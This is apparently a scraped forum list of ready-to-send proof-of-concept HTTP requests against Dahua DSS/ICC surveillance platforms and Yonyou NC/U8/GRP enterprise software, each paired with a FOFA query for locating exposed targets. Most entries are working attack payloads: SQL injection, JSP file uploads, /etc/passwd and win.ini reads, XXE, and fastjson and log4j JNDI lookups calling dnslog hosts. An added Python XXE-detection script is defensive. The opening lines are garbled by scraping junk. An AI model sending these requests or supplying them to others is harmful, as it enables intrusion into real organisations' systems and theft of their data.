) F/ W$ g3 q! ~3 dUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 O/ r* l' B! MConnection: close" h7 e& c+ }: I% i
Accept: */*; v, w3 w9 y/ h7 j; z+ b7 i$ I
Accept-Language: en1 a0 s! |3 p% Q8 D! G9 [' G% `
Accept-Encoding: gzip
' o, h0 a0 J4 Y J1 F
" w& h+ @+ q, \" {8 d8 @; v3 V2 @2 i
17. 大华 DSS itcBulletin SQL 注入
- S2 q; B- B1 h, T' I/ vFOFA:app="dahua-DSS") w0 C( N, s; i% m+ S+ J
POST /portal/services/itcBulletin?wsdl HTTP/1.1
+ `: r# G: `! ^4 `* a# v( YHost: x.x.x.x
* r" J* k' R/ a: P% \2 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* _( `% f) V. [! z- fConnection: close' k4 } ^4 g7 c4 y3 ]) z+ x5 j7 O+ f
Content-Length: 345
. Y9 A, F1 ?( P# V4 W# L! rAccept-Encoding: gzip/ ?: ]/ H; X+ e/ r$ x4 x! t, @
, Y. Y" m+ Q9 C' T9 W
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>- i0 e* W3 R) ^. A) v9 S) y7 a; V
<s11:Body>" Q5 t8 V! F2 L6 a3 z
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
5 m3 C% f8 c$ z6 I; P <netMarkings>8 k+ K" P9 h0 H- w4 s0 |
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
$ e6 {1 k5 V0 D, s2 h </netMarkings>$ u" w4 {/ c8 p; _
</ns1:deleteBulletin>$ d5 }# c6 y X% t
</s11:Body> n+ O y/ F- V3 N, X; r; k' M
</s11:Envelope>8 n, n) S- l; ]- _% {& s- v
) m# }& k, X; n- z! N; Q: y
" g" k* P6 d4 `: Q, t
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露/ ^8 Q% o& l `" H2 F
FOFA:app="dahua-DSS"
6 j3 }2 i$ K9 x# w( ?8 mGET /admin/cascade_/user_edit.action?id=1 HTTP/1.17 V6 {7 g6 y9 W; ~4 r* ]0 @
Host: your-ip2 R% c! b1 v% x8 r) i( L% L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 G" W8 X6 v1 RAccept-Encoding: gzip, deflate
! O; u/ ?) u6 ?3 [Accept: */*6 x8 K2 y o* b+ p
Connection: keep-alive
6 _2 ~% N9 h1 q: K, V4 X% e/ n( p
1 |/ o0 I: c7 ^1 J5 a {
" F9 r. i# I) ], c5 ]6 f, {" u# E1 E9 f' Z1 H Z {
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入( h; G# s% a0 g; p+ {$ j) M6 n
FOFA:app="dahua-DSS"
. a' r' }# p$ F0 K0 b7 V1 vGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.12 |! F/ ?! Y& |% G) ]+ s( m
Host:
& a8 Z2 U) X3 }- b" k9 jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 M/ l6 Y% S2 \Accept-Encoding: gzip, deflate
+ ]0 V2 C6 h+ J! ^Accept: */*
1 d( }' a+ G( `6 ^$ e3 ?# NConnection: keep-alive
0 r4 R( r8 N3 u0 n2 O m# M* n/ m* _6 W/ y
' p! t. y4 r" i( |1 M& m6 V20. 大华ICC智能物联综合管理平台任意文件读取1 [; Z9 ?/ I. J
FOFA:body="*客户端会小于800*"! V' y9 T5 E* @2 [/ b; Z5 p
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1: U, {, a) W+ {7 z! s
Host: x.x.x.x
6 _& ?4 E1 k( _! M0 M) ^2 `$ PUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; f- `7 H" U# BConnection: close
; ~- ^) }6 M% T' _Accept: */*6 _" f% H, {8 \" e7 c$ U
Accept-Language: en: b+ T' L7 w# m; [7 B: R. ~' t
Accept-Encoding: gzip2 P" V! `( \( @; H. _8 {: }
! @4 P$ C3 f# {; _) s6 L8 G
! O- N. o/ T* w3 Q# q, z$ M
21. 大华ICC智能物联综合管理平台random远程代码执行1 b/ O5 `0 V* o0 |3 C
FOFA:icon_hash="-1935899595"; @ M( y3 f( G1 D9 P' M7 e
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
+ v' ^/ R- G# w0 Y3 I0 eHost: x.x.x.x
) r+ k+ m" F2 ^; ]& ~ _3 P# l# T* @. JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) r. ?$ k, [: [) z4 a
Content-Length: 161
+ \8 o& C% o' B3 Q% mAccept-Encoding: gzip& ?4 A1 s3 r8 u( \6 o% B
Connection: close
$ v) o2 O0 Y1 `* N/ n- Z! yContent-Type: application/json;charset=utf-8
0 z$ r5 j: l @& w# J" C7 i4 ^7 C" l) R% D
{
- x/ E; M' Z; p! \% [$ {"a":{
, _$ q8 P" W; Q, }/ d "@type":"com.alibaba.fastjson.JSONObject",; H4 l" c7 T5 i7 ^+ G5 L6 B2 u' B
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}% h |& F& V; ^
}"") T i) R' L! I( Z' [ d- S
}8 p( I8 ?3 t" ^8 b& t
4 |8 A- a$ Y- A# x! D- L# g9 a) M7 x! r2 e4 R
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
K+ {6 v& b" jFOFA:icon_hash="-1935899595", o# P3 E+ S/ L( o# n2 K1 p! C
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
3 G, {% B, O4 y6 [# KHost: your-ip: b7 w Z/ @1 w7 P. l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! c! _0 _% r o* [. w- G @Content-Type: application/json;charset=utf-8
5 ?" z+ E$ n; R' y: j( Y: i7 e. u; T! r" G
{
: J4 T$ Q% u9 x- z2 i( A; J7 t: K! L"loginName":"${jndi:ldap://dnslog}"- w+ G5 C- U. f- F# W
}
8 a! T2 N, v5 y9 o: b* @
! N: g: _& \ u0 J/ Y
3 x2 V( O1 H5 f$ e* D' G: w
, h2 R7 u& E e v23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
3 h& s0 e# K; W, ~5 S) T+ }FOFA:icon_hash="-1935899595"
- r3 Y9 M3 D: OPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1) R. |. Y1 R: I. O- l, u. @9 p
Host: your-ip" |2 W/ N! F1 _) \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- ^- l: f! q( x8 N; [$ ^& f: VContent-Type: application/json;charset=utf-8- {- F4 O/ W1 g- J
Accept-Encoding: gzip# w+ f, ]3 K& H, T/ K1 a
Connection: close
5 a1 ~# \9 Z0 H# m% D$ j, s& l6 J. `& ]- u
{0 T! |6 j8 f0 z5 J
"a":{
4 p; B4 p, K4 |7 L% l& K "@type":"com.alibaba.fastjson.JSONObject",; I' N! N# e: Q2 _
{"@type":"java.net.URL","val":"http://DNSLOG"}
/ R2 s9 C! e; i$ F% Y! G2 a }""
3 V2 n8 m1 f# c+ P& t+ t}0 c6 i7 ^' S+ O- C/ F' d
, N) g. Q% I* k- A; t( v; y% i# [' V* V
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

The fname field, not the upload file name, decides where the content is written, so the .txt upload lands as a .jsp under nc_web.

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

The dsname value is handed to a JNDI lookup; confirmation is an LDAP or DNS query for the dnslog host from the target.

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Time-based blind injection: a response delayed by about five seconds confirms the flaw. waitfor delay is the MSSQL primitive; the DBMS_PIPE.RECEIVE_MESSAGE requests below are the Oracle equivalent.

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Then request:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

The file name carries the path traversal; the accessToken header is the fixed token used by the public POC.

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

The entity reference is sent as %26xxe1two%3b so that the & does not terminate the form field; the server decodes it to &xxe1two; before parsing.

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

The string parameter is itself parsed as XML by the service, so the DOCTYPE inside the CDATA block is evaluated; confirmation is a DNS query for the dnslog host.

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

Error-based: comparing the MD5 hex string with 0 forces an integer conversion, and the MSSQL conversion error echoes the value (e10adc3949ba59abbe56e057f20f883e, the MD5 of 123456).

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Then request:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
 <soapenv:Header/>
 <soapenv:Body>
  <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
   <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
  </ser:getUserNameById>
 </soapenv:Body>
</soapenv:Envelope>

The injection sits in a SOAP parameter, so URL-decoding the query string is not enough to see it; the request body has to be inspected.

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

Here no entity is declared at all: the external DTD subset in the DOCTYPE is enough to make the parser fetch the dnslog URL.

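The five XXE requests above (soapFormat.ajax, IUpdateService, smartweb2.RPC.d, XChangeServlet and ufgovbank) share one shape: a DOCTYPE that declares an external entity or an external DTD subset, with the entity reference sometimes hidden behind form encoding (%26name%3b) so that the & does not split the form field. What follows is an added example, not code from the original post or from Yonyou: a Python check that recovers the XML from a text/xml or form-encoded body, undoes the form encoding, and reports which external entities are declared and which names are expanded. The sample bodies are copied from the requests above; the function names and the regular expressions are this example's own.

```python
"""Spot XXE payloads in captured request bodies.

Added example, not part of the original post: it reads the raw body of a
text/xml or form-encoded request, recovers the XML, and reports external
entity declarations.  Sample bodies below are copied from the Yonyou requests
on this page; the helper names are this example's own.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM "uri"> (parameter entity),
# or an external DTD subset <!DOCTYPE root SYSTEM "uri">.
_EXTERNAL_RE = re.compile(
    r'<!(?:ENTITY\s+(?:%\s*)?(?P<ent>\w+)|DOCTYPE\s+(?P<root>\w+))\s+'
    r'(?:SYSTEM\s+|PUBLIC\s+"[^"]*"\s+)"(?P<uri>[^"]*)"',
    re.I,
)
# Where a declared entity is expanded: &name; in content, %name; inside the DTD.
_REF_RE = re.compile(r"[&%](\w+);")
_PREDEFINED = {"amp", "lt", "gt", "quot", "apos"}

FORM = "application/x-www-form-urlencoded"
# Constructed from the request bodies on this page (whitespace as sent).
SAMPLES = {
    "soapFormat": (FORM, 'msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
                   '<soap:Envelope xmlns:soap="http://sch emas.xmlsoap.org/soap/envelope/">'.replace(" emas", "emas") +
                   '<soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode>'
                   '</soap:Fault></soap:Body></soap:Envelope>%0a'),
    "ufgovbank": (FORM, 'reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">'
                  '&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest'),
    "XChangeServlet": ("text/xml", '<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM '
                       '"http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>'),
    "IUpdateService": ("text/xml;charset=UTF-8", '<iup:string><![CDATA[<!DOCTYPE xmlrootname '
                       '[<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]><xxx/>]]></iup:string>'),
    "benign": ("text/xml", '<?xml version="1.0"?><r><a>a &amp; b</a></r>'),
}


def form_fields(body: str) -> Dict[str, str]:
    """Split a form-encoded body by hand.  Splitting on '&' before decoding is
    exactly why %26name%3b survives the form parser and reaches the XML parser
    as &name; after the server decodes it."""
    fields: Dict[str, str] = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def xml_documents(content_type: str, body: str) -> List[str]:
    """The XML a request carries: every form value containing markup, or the
    whole body for text/xml."""
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime == FORM:
        return [v for v in form_fields(body).values() if "<" in v]
    return [body]


def find_xxe(content_type: str, body: str) -> Dict[str, object]:
    """Report external entity declarations as (name, uri) and the names expanded."""
    externals: List[Tuple[str, str]] = []
    expanded = set()
    for doc in xml_documents(content_type, body):
        for m in _EXTERNAL_RE.finditer(doc):
            externals.append((m.group("ent") or m.group("root"), m.group("uri")))
        expanded.update(n for n in _REF_RE.findall(doc) if n not in _PREDEFINED)
    return {"xxe": bool(externals), "external": externals, "expanded": sorted(expanded)}


if __name__ == "__main__":
    for label, (ctype, body) in SAMPLES.items():
        print(label, find_xxe(ctype, body))
```

A hit on "external" with a file:// URI means a local file read (win.ini above); an http:// URI means an out-of-band probe, which is what the dnslog hosts on this page are. On the application side the fix is the same for every entry: disable DOCTYPE declarations and external entity resolution in the XML parser the service uses.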
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
